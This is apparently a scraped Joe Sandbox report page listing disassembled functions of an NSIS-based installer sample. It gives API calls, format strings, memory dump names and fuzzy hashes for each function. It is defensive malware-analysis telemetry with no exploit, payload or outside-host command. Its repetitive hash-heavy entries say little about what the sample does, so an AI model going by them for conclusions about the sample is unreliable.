Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58

Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
CharNextW.USER32(?,?,?,00000000), ref: 004060D6
CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Strings

*?|<>/":, xrefs: 004060B6

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: fbfd7a6a6085d398f7947defe9e72fce66e027f12e5118b4d0e8a3d4981e6075
Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
Opcode Fuzzy Hash: fbfd7a6a6085d398f7947defe9e72fce66e027f12e5118b4d0e8a3d4981e6075
Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758

Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
wsprintfW.USER32 ref: 00404483
SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496

Strings

%u.%u%s%s, xrefs: 00404470

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: f70a225c52dc94088ec55034452069e5f0159b4652b3b317631306071439071b
Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
Opcode Fuzzy Hash: f70a225c52dc94088ec55034452069e5f0159b4652b3b317631306071439071b
Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: 76b1160061a8bcde82d673e25faa9719cd8acd17af1c4b15f649e1f749d05235
Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
Opcode Fuzzy Hash: 76b1160061a8bcde82d673e25faa9719cd8acd17af1c4b15f649e1f749d05235
Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759

Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004062A4
lstrcatW.KERNEL32(00000000,...), ref: 004062C7

Strings

..., xrefs: 004062BF
%02x%c, xrefs: 0040629C

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

<RM>, xrefs: 00402713
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
NathanColeman, xrefs: 00402770

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$NathanColeman$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-4012154794
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Skipping section: "%s", xrefs: 004050E1
Section: "%s", xrefs: 004050A5

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042634C,762323A0,00000000), ref: 00406902

CreateFontIndirectW.GDI32(00420110), ref: 0040216A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D

Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
lstrcmpW.KERNEL32(?,Version ), ref: 00407276
lstrcpynW.KERNEL32(?,?,?), ref: 0040728D

Strings

Version , xrefs: 0040726D

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC

Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
GlobalFree.KERNEL32(00000000), ref: 004063CA

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674

Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040492E
CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404906

Memory Dump Source

